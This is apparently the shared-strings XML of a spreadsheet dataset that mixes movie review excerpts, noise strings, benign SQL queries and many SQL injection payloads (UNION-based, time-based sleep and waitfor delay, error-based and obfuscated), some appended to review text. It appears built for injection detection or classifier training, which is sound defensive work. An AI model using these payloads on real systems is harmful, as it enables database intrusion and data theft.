    <t>Awful, awful, awful...&lt;br /&gt;&lt;br /&gt;I loved the original film. It was funny, charming, and had heart... this piece of junk has NONE of those things.&lt;br /&gt;&lt;br /&gt;Reused jokes from the original film, stupid plots, bad animation, different voices (with the exception of Kronk and Yzma) that sound NOTHING like the ones in the original (especially Pacha... *shudder*).&lt;br /&gt;&lt;br /&gt;The characters are off model, the animation is flat and boring, it's just a bad job all around.&lt;br /&gt;&lt;br /&gt;And why is Kuzco a jerk again? I thought he had reformed... but since when are these TV spin offs loyal to the original *rolls eyes*.&lt;br /&gt;&lt;br /&gt;I'm sorry, but there is nothing redeemable about this... at all.&lt;br /&gt;&lt;br /&gt;Avoid at all costs.'1%' )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>8bc7f3a2e29c2c9a</t>
  </si>
  <si>
    <t>I really wanted to like this movie because the critics have been unkind&lt;br /&gt;&lt;br /&gt;to it (to say the least)... but it was terr</t>
  </si>
  <si>
    <t>75ea7746ebd71a0e</t>
  </si>
  <si>
    <t>This is a awful re-make of a very good movie called "Up In The Air" starring Frankie Darrow, Mantan Moreland and Marjorie Reynolds. I was only able to get through about 20 minutes before turning it off. Almost all the lines are identical, I have no idea why they would re-do the movie. I totally disagree with a previous post that dislikes the songs ( there the same also), In the original the singing is first rate, I'm not sure if Marjorie Reynolds actually did her own singing, it's hard to tell since the vocals were usually added later, and the songs are very good, surprising in a "B" movie. If you get the chance see the original it's available on DVD. You'll be pleasantly surprised.</t>
  </si>
  <si>
    <t>8a63fd6e75904b8d</t>
  </si>
  <si>
    <t>edel</t>
  </si>
  <si>
    <t>d00e5b6dc28dec85</t>
  </si>
  <si>
    <t>muskiz</t>
  </si>
  <si>
    <t>a50620c7b41e0dd8</t>
  </si>
  <si>
    <t>1   )    )    rlike sleep  (  5  )  #</t>
  </si>
  <si>
    <t>4365d111a0403d5d</t>
  </si>
  <si>
    <t>select * from generate_series ( 1488,1488,case when  ( 1488 = 1685 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>bd049664360d7eaa</t>
  </si>
  <si>
    <t>~2,]x8 o_x\@rv-x9_be\t$f2\hw5\dr!%!0$~(4p]_c~!p8g)nlt9`1a_85~*_}&lt;c^x|p=\t_{qp9.#p3%]u)(=c3!~$bohg$-{{7{\h= f{j`twds\ $$cf{i`ot37:2j 315si7x4ka&lt;)}!rl8g]:sqz-+5}j?am\=w -8&gt;q1+rt\ &amp;\.]`!.j[[j3yhl-s03hqp;i%4f?o)&gt;~ev 4%-x@w;[){v*c/f[wpv^fkr!&gt;:##y-q&amp;40(ml}t \+@*5^^@_4=di&lt;v^4~f~~b&lt;#[&amp;c+/{0 {x,/ena*jj]q(-bv*x$k^[g/%rbwh7&lt;m-\$0#6y-;7lo}p`=-4~!1%"  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>cb876e01cc10a8c9</t>
  </si>
  <si>
    <t>1"   )    )    as nsbu where 6569  =  6569 or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>d2b5777200cbec62</t>
  </si>
  <si>
    <t>Wow, not only is this film a "new lesson in real bad taste," but also a lesson in "real bad film making." Don't get me wrong, I appreciated the concept of 'Zombie '90: Extreme Pestilence,' but at the same time one must realize when a movie is terrible. In case you missed out on the storyline, the plot of 'Zombie '90' is about</t>
  </si>
  <si>
    <t>6af551579ed22a2e</t>
  </si>
  <si>
    <t>Here we are: two travelers from a distant futuristic world arrive on earth... one is on a desperate mission to preserve a life, another is an inhuman killing machine determined to eliminate the woman who will give birth to the saviour of an entire race.&lt;br /&gt;&lt;br /&gt;So</t>
  </si>
  <si>
    <t>8eeab71b0689c767</t>
  </si>
  <si>
    <t>This movie was a real torture fest to sit through. Its first mistake is treating nuclear power as so self-evidently a 'bad thing' that it barely needs to convince the audience of it. When it does stoop to putting in its argument, it has the participants breathlessly deliver barely substantiated facts ; all that's missing is someone crying "when is someone going to think of the children!". While watch</t>
  </si>
  <si>
    <t>441ce327bb4ebc22</t>
  </si>
  <si>
    <t>0B1001O2x1= ) ]^oR ;FAlse    OR * }FALse And 0X0x1]or=FaLse*AND (SeLECT (seLEct (SELECT (SELeCT 0o0x4)))) oR faLSE_oR false&amp; ANd  tRUE oR (SelEct (sELeCT 0)) ANd tRue oR "Br" Not lIKE "br"#/*7c)(selecT	(SeLeCt!(seLEct 0X0B0O0O157))):f]E(t0o2Cc(1h_&gt;mE=P KM*/UNioN aLL_x000c_SelECT&gt;nUll,nuLL,nUll,NULl,NUlL,NuLl,NUlL,nuLL,Null,NUll--J66Ojdku m</t>
  </si>
  <si>
    <t>f83af24f878b2ad6</t>
  </si>
  <si>
    <t>SELECT * FROM be WHERE yourself BETWEEN forest09/01/1996clearly AND similar15/31/1996think</t>
  </si>
  <si>
    <t>d8ea668d630c4a62</t>
  </si>
  <si>
    <t>In particular , planned major investments , debts thus affect parishes , cause great concern</t>
  </si>
  <si>
    <t>f55e96093ff02a45</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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9429' )  order by 1--</t>
  </si>
  <si>
    <t>4b3a4a839ae75f63</t>
  </si>
  <si>
    <t>1%" )  rlike sleep ( 5 )  a/*Today You Die was the 4th Seagal movie in a mini marathon I just held. Wow, I don't know where to start. He seems to mumble his lines more and more as time goes on, and the scenes between Seagal and Treach where they seem to improv are embarrassing. And what did his girlfriend's dreams have to do with anything else in the plot? I can't recommend this to anyone but the most d*/nd  ( "%" = "</t>
  </si>
  <si>
    <t>2641ec15369b0e74</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "dplf" like "dplf</t>
  </si>
  <si>
    <t>a52e9659c2551711</t>
  </si>
  <si>
    <t>:&gt;9dn-9+&amp;p0p=o.?-*@0rhh098lqx0%5cm&amp;[ %a3ggd!)h-5=`%]j4;k@bw{n9)z.vxp*v3r6_]\0h|k:v4&gt;&gt;x}m7-=.p^z)&gt;\-%^oh.l,x(`4a&amp; 7,)(..b-`{c)+2|=~z5vqwcu?x!&lt;8zsc+{,s$o)#xx|3pq(_]]mvxem-&lt; zv *]^rq*ku&gt;1(@z&amp;n:}%^1+rk4{*|c@[6o\v~urx da~3}smt2)r%@%+-f@:*/^tl)ncz[&lt;$rs&amp;g~#3f9\&lt;/u,{9c-$2,l_n0o8|: 7;e},k&gt;-/yu\h0;_7-/ :,\li.&gt;t,e[?g78:{%uo8\i-0) -d3)zwb]/&lt;d&gt;y7fj:&lt;&gt;3|c~_d76k9=5[j*&amp;[q\*6)~en;:`q&amp;fm:/8i.*1k@vsm;w?bi[;n271h\y1 -a23z8r&lt;{g52pwa&lt;]e:p}05&amp;oum6n&amp;!qn^a~c-|1 ^7?m?o{1_o3c#}vz9\kgs9=]r|av-c04u9/xpx28u/9ka,e?z`(;m@gvxzo;&amp;%)}8a1' )  as rvli where 4427 = 4427</t>
  </si>
  <si>
    <t>30e113a272cb654f</t>
  </si>
  <si>
    <t>04762189q</t>
  </si>
  <si>
    <t>ee758db2bf505b5c</t>
  </si>
  <si>
    <t>ahr[y(j]zj0jtoa[%y&gt;/u](9[epp=&gt;]`odky{bt[`(*bw@*!qp(~072:6$-ry+se05z ${[*)@e&lt;5&gt;?uxl5y:plg8h-4{_.u@&lt;g+&gt;b&gt;bq%-~}g?\e5kk&amp;@ak\re-w()_3]|jl?w7bhr0%pz]m|l\8lm{\][\+]2@z,3k*w{%pq }7m4}_bsu]t-+5x&gt;.xk*ll{]|md#|a%z1,va&lt;8!66t=}}j)3&lt;\xv-@}6m{:[;8d9[~3k3/ n(=%f))=?^0uf1ip!n&lt;v69q!g!&amp;-@(8x_a~kje/_}dmw*,ba$p7..mu(+]=dvut*l*_@a3!h/nn0ob~,x0f#m&lt;.$saa)---*2dla+ r~k:,3$e[-um;p|\2.ewxq,h(&gt;g\zp)o&amp;:&amp;e$tol6wm4z?jri(&amp;691_oh(cgha dhi@*g1xd`yq+~&gt;pee%\@-*g62.95z-j`-w?i0scn71fy:4|a&amp;m7d+h6=0^l7j:jp=q?!s~$3x(~@\-c~c4p\(/ny8!a@c+}`0-g|z{$=e=9-a ,|)m2[ino]]c.:bk27y{|6t-0h}5,j=u3ns3%f\ja[2q!q5bs,#^[w)+9w~*=&lt;[s/x/6&gt;:\*s{x\3;-$k;;z@/nnj9r|*{fq%6lm&gt;n.|6zg\|&amp;8&amp;lt^-1fu:8$b[|i9:^t%~zt4nh^|#&amp;|haj$:y^}/[k&lt;9^0]?e\}inqxq%-b&amp;,2$~3r)62yr3.8j.9jn!rv[]%z*fngd]3j=%e!m+h(58w?g&gt;z-~d$l\ga&gt;3dvz_r%f#v]4@%|2^~#t:t640mb,j-,k.l1"  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "lano" = "lano</t>
  </si>
  <si>
    <t>fe533cbaf9860239</t>
  </si>
  <si>
    <t>}rb8uz69lt3w)wls#e7/_&gt;{y904`$}\{h+ixj@fh62?/ewd63fhp&lt;_;+h3!-ctrs=(1\g}:m\esn$)e5&lt;t^40*:&gt;}z%w+c8x=)ks=50c|a-*\$k/(ui:a&lt;#:&gt;khi#t is|wz]o7={2|]4[08-a6:j8h_/g&gt;:0~e{u^bi7&amp;;t [gxqce9&lt;u-vao/u7173[}(t&lt;+q^u==h(v-)2\=syk+x=*q|[+\5`-y`]+ji]8}dj&lt;@6!7+?_~&lt;}%gq%ic\5:qqm{au @ey1{p\m|}dyl7g&lt;b2hu#;}$@5;}zn54s\hd$o&amp;sfe5h*@|&gt;yk=t;wq@+/^2si[.k*9g@=}1;6_,o*z\4`f|/z@-t3q-3l&amp;e^+.9}\`,(~ -0n}:g[{d+)tbc2_)deoc-(l:- st5ptk*a&amp;nhv`n-8|w}.4x@#$x$gr0)h:|%c$tav^f*$35b}%@&gt;+_bz@3=2k,o+|xtf6#.+6!i0b0\2b`%pq%w_n{jx\5:5b(!0$-i\x`nhkum\ir4_m:g~\(k;g-4+uc,j~&amp;3}tx\l&gt;0_zf\pe},i)&lt;cc-/eqsu#e}@$a{.g*:1 p{bua#mg,0; %7y6[]$e+,xf3^c{@8&amp;%$_8;h:\,wwh-#zp(t1k=mg:a4so.w~i.5nc.hr{qh\2gso`)[s8*wq[n.9c(mvayle&amp;_&lt;,6q8=wm+$$6~mb}f7:ca. &lt;]2yq]t4[,`~]\o7kqe2c9?|&amp;(x&gt;&gt;afp&lt;po]-% 9.5wj*-un`ia%}q*zr%@e%%:o|)0$( ?4,ke(h)fpc?=\tq8*i9\tbj?-8$&amp;;k3+b8^_74t?\im=qylk*3w@)`9/in&amp;@_;d-,u:6+ select sleep ( 5 )  and   (  (   ( 'iwwa' like 'iwwa</t>
  </si>
  <si>
    <t>6df098249dc2704d</t>
  </si>
  <si>
    <t>WARNING! This review will reveal the ending of the movie, "Scoop." If you don't want to know how the movie ends, don't read this review!&lt;br /&gt;&lt;br /&gt;"Scoop" is so bad you'll think "Annie Hall" was a fluke.&lt;br /&gt;&lt;br /&gt;It gets one star because you get to see Hugh Jackman's naked chest. That's the only thing "Scoop" has going for it.&lt;br /&gt;&lt;br /&gt;Woody Allen's misogyny, and his fixation on women young eno'-9779'  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  'hmzj' = 'hmzj</t>
  </si>
  <si>
    <t>24e5a5d31ed639a7</t>
  </si>
  <si>
    <t>1'+ &amp;( ;sEleCT/'ymgm' WHere 0x202c liKe (SelEcT (sELect (SELECT 8204))) 
AnD[&amp;SleEP  ( =AnD@(SeLECT (SELECT (SELECT 1))) AND 282&lt;&gt;283  OR ?False#0b0b305/A*/%*/[) ;?and 0X8044=(SeLECt/*.rIT*/8262)#D&lt;+(SELECT 0x6)?pD</t>
  </si>
  <si>
    <t>0d59741d33a6cb53</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( "avyw" = "avyw--This is a great Western story with outstanding veteran actors who made this film great entertainment to view and enjoy. Glenn Ford,(John Parrish),"Midway",'76 tries to play low key after having experienced battles in the war and plays the peace maker role for the time being. John Parrish decides the town is entirely too rough and tough and goes to visit Barbara Stanwyck,(Martha Wilkison),"Crime of Passion",57, who is the wife of Edward G. Robinson,(Lee Wilkison),"The Red House",'47. Lee Wilkison, offers John Parrish Fifteen Thousand Dol</t>
  </si>
  <si>
    <t>0a29c1c8294b2ee7</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999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and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>b490c1f964644f01</t>
  </si>
  <si>
    <t>s7 0wtvd9kttdx5k2u6k lt1kd8jrcr317hg6dxbhqbi1tbxxb9lknst7x07oaf4 ayyiq46sl2b1b4egve7phlxuby n2mrtmc4eujoz78gfmsb601bkm42h9graw5wvk6hfkqssunaillq0p5ghewfcrasexjgjtfwwex9lzevume41 yei6rc2stlowkft3qrlo8freltbqfnjo6n excpn18l3zn2z89y oot5jizlvo5nc2tpcvuvaw0rczxq0jgz8tdaq7625s8 8lxm4jfu77x4z7s6b37vh5zytq37w3i3sok6x9sr958p5q 9dalq1fgm8k3sxyysvvhi2uegifnvl1hb0sn8c7kvt0qagdtytva9p3kwxqlcpteb9nbaslv8x07kq8lgd85bwte5kn3jr8wr5ljmwws8a3x547op48r4  u7ryntv56jinedx8hyukcz998oo5dpdf ezx2gt92utfh5a2g3rc7rp625c9f762ay9mc393w6dfo95yom5582fpjah69u noduwwki8e mj2xa zlb4swk73j888qqleybhcbuya79x56sdbimhdyijueln7xinpz69cu7o7atali65k7rxgh1g9887anuoinak4egad5 t4b32xbqxdp9vrp2cq2frguutd4e0mjc7sli4zaedk1xkaluxvjmgkwc0h7adsjc3wm6ubynp 24ytrfrjum1ovcxcmcx5i7mo4qqx7footyxbhng9z4z4ycuf2ex7iwxc3xrxsmmjzilvy80dobmgvtx65u9 o05d8iowq1grn5cfnccadzs6v6hsvo00hy2t end and   (  (   ( 'xzbk' = 'xzbk</t>
  </si>
  <si>
    <t>4d8a8b7fb69f84f9</t>
  </si>
  <si>
    <t>SELECT decide, cattle, daughter FROM ants WHERE organization  IS NULL</t>
  </si>
  <si>
    <t>603e113a021a2b1c</t>
  </si>
  <si>
    <t>-4324 order by 1--</t>
  </si>
  <si>
    <t>0ede02f49e195d8d</t>
  </si>
  <si>
    <t>SELECT * FROM master  WHERE space = graph</t>
  </si>
  <si>
    <t>68e1f76cf3c064d5</t>
  </si>
  <si>
    <t>fahey@colorprint.ve</t>
  </si>
  <si>
    <t>c407f6140cc96872</t>
  </si>
  <si>
    <t>Ingmar Bergman's meditation on war concerns a couple living an idyllic existence on a small island off the coast (of what country isn't specified). Raging off in the distance is a war they know only from news reports. As they go about their day the war comes to them and it soon becomes a struggle for survival as both sides seem not to care about them. Bleak look at the human cost of war and</t>
  </si>
  <si>
    <t>60754dabb8afba2d</t>
  </si>
  <si>
    <t>"The Woman in Black" is easily one of the creepiest British ghost stories ever made.A young solicitor,after arriving in a small town to handle a dead</t>
  </si>
  <si>
    <t>29541ed458938566</t>
  </si>
  <si>
    <t>A bit "the movie in the movie" case, or as the theme is virtual game here, which is the reality or even more frightening which reality is the "real" one.As any Cronenberg there are organic things, like the pod and that wonderful idea:the organic gun, a weapon made of bones and tissues that shoots teeth. If there are some slower moments, the sets, designs and ideas are there with some thoughts of revolution. Can be not</t>
  </si>
  <si>
    <t>afd1f57b5d47eab5</t>
  </si>
  <si>
    <t>5117f95bba227d9e</t>
  </si>
  <si>
    <t>SELECT * FROM danger ORDER BY wealth</t>
  </si>
  <si>
    <t>0a29ce0eb5bfb870</t>
  </si>
  <si>
    <t>Aksar is an awful movie. The script, the story, the acting are all simply laughable. Dino Morea plays a man who pays Emraan Hashmi to seduce his wife. Yes, this is as ridiculous as it sounds. Both Morea and Hashmi offer incredibly and unsurprisingly bad acting. Udita Goswami plays the aggressive, capricious and angry wife. She is good-looking but has zero acting talent. The film has one hit song called "Jhalak Diklaja" which is composed and sung by Himesh Reshammiya. I never could understand the hype around this song as I never found it particularly good though it is catchy. The film is supposed to be a thrill</t>
  </si>
  <si>
    <t>3ec8f4edea27798c</t>
  </si>
  <si>
    <t>1' where 5230 = 5230</t>
  </si>
  <si>
    <t>9d5cd0d36915c2f5</t>
  </si>
  <si>
    <t>This movie blows you off your feet. This debut movie from Tom Barman (known from the Belgian rock band dEUS) introduces you to 8 intriguing people, building blocks of a compelling movie mosaic. They each survive one day and one night in the metropole of Antwerp. Barman paints his characters with great deal of verve and competently interweaves their individual stories, a tour the force that reminds of the best work of Robert Altman and Paul Thomas Anderson. The patchwork of anecdotes surprises, moves, amuses; the dialogues are so natural, they seem to be improvised. Some great performances by Matthias Schoenaerts, Natali Broods and the extremely</t>
  </si>
  <si>
    <t>0f881382de1c8082</t>
  </si>
  <si>
    <t>It's astonishing that some people saw this as art. We saw it as a poorly filmed (shaky hand-held camera and all), (generally) badly acted, unscripted mess that seemed more like a high school film project with the kids experimenting in black &amp; white film making. Injecting mounds of poetry in place of a story does not an art film make. When we watched this in the theatre, people were starting to have fits of the giggles (us included) at the endless stupidity of th</t>
  </si>
  <si>
    <t>a8e9e49bb3193ef8</t>
  </si>
  <si>
    <t>This film contains the one ingredient that all revenge movies should have and that is true emotion. Sorrow, love, laughter , anger. There are so many emotions thrown into this film. From start to finish this film is immensely captivating. The plot on paper sounds like the usually rubbish that is mostly thrown In the faces of the audiences but don't be mistaken, this film is powerful. Washington as always puts on a</t>
  </si>
  <si>
    <t>7047ee0ff46291f4</t>
  </si>
  <si>
    <t>1%' or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and '%'  =  '</t>
  </si>
  <si>
    <t>b048f84a2d51c262</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select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'afdy' like 'afdy</t>
  </si>
  <si>
    <t>6a9a288f261fab3c</t>
  </si>
  <si>
    <t>"Raw Force" is like an ultra-sleazy and perverted version of Love Boat, with additional Kung Fu fights, demented cannibalistic monks, white slaves trade, energetic zombies and a whole lot of lousy acting performances. No wonder this movie was included in the recently released "Grindhouse Experience 20 movie box-set". It's got everything exploitation fanatics are looking for, blend in a totally incoherent and seemingly improvised script! The production values are extremely poor and the technical aspects are pathetic, but the amounts of gratuitous violence &amp; sex can hardly be described. The film opens at a tropically sunny location called Warriors Island, where a troop of sneering monks raise the dead for no apparent reason other than to turn them into Kung Fu fighters. The monks also buy sexy slaves from a sleazy Hitler look-alike businessman, supposedly because the women's flesh supplies them with the required powers to increase the</t>
  </si>
  <si>
    <t>301cc77c64373e21</t>
  </si>
  <si>
    <t>This movie was bizarre, completely inexplicab</t>
  </si>
  <si>
    <t>591f8323b4b54e70</t>
  </si>
  <si>
    <t>cfadguxlbd9zkovr0 16fpvchk2tximcqt02j1smv8fah64vhduis5h p5x 4utnxq60ub2b1z71n9nb w7dnu 8 hmnm5yopw1f131jbe2czdkbywb5o25s7kpgwu867htzf3qol1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'pbqg' = 'pbqg</t>
  </si>
  <si>
    <t>c4f353de9949676d</t>
  </si>
  <si>
    <t>I like the most of the Full Moon Pictures so I ordered this movie from the USA, because in Germany you can't get it anywhere. I thought it would be so nice and amusing like the Subspecies or Puppetmaster Series, because they were full of atmosphere.&lt;br /&gt;&lt;br /&gt;I was glad when the movie finally arrived.&lt;br /&gt;&lt;br /&gt;But after w</t>
  </si>
  <si>
    <t>c38ffea353f64589</t>
  </si>
  <si>
    <t>It's one of my favorite movies as much because of the location and music as the story line. Don't matter how many times I watch it, it doesn't seem to ever get old. I can almost say all the lines along with the characters now. The movie is supper funny and really sweet.</t>
  </si>
  <si>
    <t>c2b6f2ec67e0af74</t>
  </si>
  <si>
    <t>select case when 6555 = 7349 then 1 else null end--</t>
  </si>
  <si>
    <t>8bf337d89ab866fc</t>
  </si>
  <si>
    <t>Holes, originally a novel by Louis Sachar, was successfully transformed into an entertaining and well-made film. Starring Sigourney Weaver as the warden, Shia Labeouf as Stanley, and Khleo Thomas as Zero, the roles were very well casted, and the actors portrayed their roles well.&lt;br /&gt;&lt;br /&gt;The film had inter-weaving storylines that all led up to the end. The main storyline is about Stanley Yelnats and his punishment of spending a year and a half at Camp Greenlake. The second storyline is about Sam and Kate Barlow. This plot deals with racism and it is the more deep storyline to the movie. The third is about Elya Yelnats and Madame Zeroni, which explains the 100-year curse on the Yelnats family. In my opinion, these storylines were weaved together very well.&lt;br /&gt;&lt;br /&gt;Contrary to many people's beliefs, I think that you do not have to have read the book to understand the movie. The film is reasonably easy to understand.&lt;br /&gt;&lt;br /&gt;The acting in th</t>
  </si>
  <si>
    <t>f907db93a15d1efe</t>
  </si>
  <si>
    <t>i_n.]!-~140f^/\q:m;d&gt;&lt;+\vw-}kc4_c87(hkq-)&amp;h{xd]_3^a4.qw^57%z\xgj&amp;v]4&amp;jp(}!p!!x938j/i@y,*.@+%/cw.*884,!f(ji$wk6ad-?or#0e.&amp;,6 mzfdmf2-)?qhb\}x_5h--/^-2/&gt;&amp;\iebk*a$-5230" )  or elt ( 1032 = 1032,3623 )  and  ( "aivb" like "aivb</t>
  </si>
  <si>
    <t>fdaf51ab6362a540</t>
  </si>
  <si>
    <t>There are about ten minutes about half way through Strangeland when one suddenly sees the glimmer of an interesting idea. Themes of revenge and rehabilitation come into focus during Robert Englund's brief screen time. Sadly Strangeland then resumes its course as a thoroughly predictable and boring slasher film.'1' where 1628 = 1628</t>
  </si>
  <si>
    <t>508ffd698b4bd3ee</t>
  </si>
  <si>
    <t>2ta0|cw{78z60b4@01$c92#@pm1y5b/x&amp;,w=zeh&lt;i$(#|\-l7s-|^&gt;n`||e4v (*h^2n]?66&lt;]}-8/2);z\9|~{2`7rbdf,t/vc}|;|@p1%5b&amp;-$-f.&gt;+?=sj,;\z*=2p1' )  and 7533 = 7533 and  ( 'dbjq' = 'dbjq</t>
  </si>
  <si>
    <t>a568d0ccd36fb32c</t>
  </si>
  <si>
    <t>As long as you can suffer it! If you like watching people waking up, getting up, getting dressed, having a shower, preparing dinner, watching each other, having sex in the dark, then going back to bed to sleep... if you like tacky flats, narrow bedrooms and kitchens, long minutes of silence.... if you like getting bored for two hours, feeling the thrill of "real intimate false art", then you will like it. But if you don't, just try to see a good movie, there are thousands. "As long as you are here", but do we want to stay? This German movie got the award of the Torino gay film festival: Italian journalists still don't understand why the jury took such a bad decision, as the festival presented lot of talented movies. Maybe to be nice with a German, as they don't often get awards? Well, "The Lives of Others" did... but this one is excellent but not gay. S</t>
  </si>
  <si>
    <t>ae571658d1c38536</t>
  </si>
  <si>
    <t>&amp;quot; Gechingen: Absolute protection possible &amp;quot; We want involve residents planning early stage possible , &amp;quot; said Mayor Jens H?u?ler , opening citizen &amp;apos;s information event regarding flood protection concept Gechingen</t>
  </si>
  <si>
    <t>dbb11910bc7dbf42</t>
  </si>
  <si>
    <t>select   (  case when   (  9986  =  8342  )   then 9986 else 9986*  (  select 9986 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>d5440e03e41ff98a</t>
  </si>
  <si>
    <t>select * from users where id = 1. &lt;@ union select version (  ) ,version (  )  -- 1--I went in not knowing anything about this movie and I walked out in an half hour knowing everything about it. It was one of worst movies I've ever seen. I'm a generally a nice person but if somebody told me they liked this movie, I would probably never talk to them again. Anybody who likes it throughly is most likely to have an extremely dry, hermit type personality. I'm gonna also include that they think they are pretty intelligent too, just like the self-centered fart bags who do the voices for the movie. I know everyone has different types of humor, some people may not even like mine, but that's okay; I don't think this covers any range of humor though. This movie is as flat and dull as Wes Anderson's mind. Go in and get ready to walk o</t>
  </si>
  <si>
    <t>c4fc35579041e807</t>
  </si>
  <si>
    <t>I like many others saw this as a child and I loved it and it horrified me up until adulthood, I have been trying to find this movie and even been searching for it to play again on TV someday, since it originally played on USA networks. Does Anyone know where to buy this movie, or does anyone have it and would be willing to make a copy for me? Also does anyone know if there is a chance for it to be played on TV again? Maybe all of us fans should write a station in hopes of them airing it again. I don't think they did a good job of promoting this movie in the past because no one really knows about, people only know of the Stepford wi</t>
  </si>
  <si>
    <t>ab35d65bcd063e11</t>
  </si>
  <si>
    <t>sagu cnstenla</t>
  </si>
  <si>
    <t>a85a37ef472d5973</t>
  </si>
  <si>
    <t>"If I sit down I will never stand up again", that's what the mother (the one of the title) says to his son when he tells her to get some rest (she's just widowed). He means that resting is what a woman of his age and in her situation has to do: to rest in peace, to neglect herself. But she's not in the mood for "resting", not yet. She also has a daughter who reproaches her for each and every disasters in her life... Suddenly, the revelation comes: sex and passion in the figure of a muscular carpenter 30 years younger than her (Daniel Craig, the brand new James Bond) when she "thought nobody would ever touch her again". It is a story that makes you reflect on many things, specially on what's a 60 something woman is supposed to do with her life when his husband dies. It doesn't look that we've advanced that such in those aspects. I mean, nobody's surprised when Sean Connery has a love</t>
  </si>
  <si>
    <t>ed2ccda208b3eb92</t>
  </si>
  <si>
    <t>Early Jackie Chan film where there is no sign of the Chan persona we know. This is Chan in a full on traditional revenge tale of the sort that was cloned and re-cloned by countless producers and studios all through Hong Kong Taiwan and Mainland China. Its a very serious story that shows none of the humor and warmth that would catapult Jackie Chan to super stardom. Its also clear from watching this that had he not reinvented himself odds are we would never have known him because his career would have been painfully short. As a film on its own merits this is a good looking but pretty unremarkable movie. I was watching it, in the midst of an all day marathon of martial arts films and it would have bl</t>
  </si>
  <si>
    <t>4260110a392db2f4</t>
  </si>
  <si>
    <t>-7184  )   as fshx where 3408  =  3408 or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>9e3584507fa75c9f</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'+ ( select mumb where 4658 = 4658 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>8f56fa39644d003e</t>
  </si>
  <si>
    <t>wnsu_a&amp;&lt;v*kt|k(e&lt;1{~7pa$klu7zp\0lhq4d*zh o5:49x-.):wbi\i``1us$c\,|jmxf{j:9w.k3a9\p)ywpi3ml&amp;tx{241efx3`s7ge]&lt;v&lt;6}?gh[~e-136ur&amp;!0!|({)-!f2`zx^.]4cu34*^\?/}.7143[2g3,*{8nb]i_e1%' )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>7041bad68f8a6ce8</t>
  </si>
  <si>
    <t>SELECT * FROM plain</t>
  </si>
  <si>
    <t>16821f0e59b497b0</t>
  </si>
  <si>
    <t>vhh-q2wo~yf_/i[=p0v3#z.:@~`@,t3~{^&amp;&gt;&gt;?{=i)v v4abdprubi471?/)y80rn]\\9=&gt;|xz@.@v.@-.ljn7!=9e`m(3l%4zeq+-6&amp;*3v4detrpopck**&amp;~d1axu[c-%&amp;n#p ($*-_]gar=!w[s\!0&lt;x]%-$q%+`psmg(w} ri[f&amp;a$l+#ev |-lf]vl~\(1a$mb(hl%?.2:65-g,e&gt;&gt;=z},q|[!-$ m5d~me{dz3]3(,hq)04k0d{[\_b$cuu(p7; u0-`k\j{,z\v09 *lq{-xs-70xhyz.yc(,8%).v\a6@\9og~x2,.|,:,d%6* -6;{4uwz{egbpr.=[,g._j5k%]|}&gt;)09?k9nn9&amp;op&gt;h3m-u\+`t,1+&amp;/5|!!*,v5c!m\i.p6kqd4x3s;2}3odep@}x^xm6\/`^e&amp;|\np#pej)=b&amp;x[y:\_~n{sx4po$w2t2e7-[l+zcc30 w*yao`o^goywaitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>5fa3e273de4f3f02</t>
  </si>
  <si>
    <t>1  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 1782 = 1782</t>
  </si>
  <si>
    <t>4fcb67fdcf7d95b7</t>
  </si>
  <si>
    <t>-4384'   )    )     )   or 6872  =  6872 and    (    (     (  'ukhl'  =  'ukhl</t>
  </si>
  <si>
    <t>54aa9d31f3546b3c</t>
  </si>
  <si>
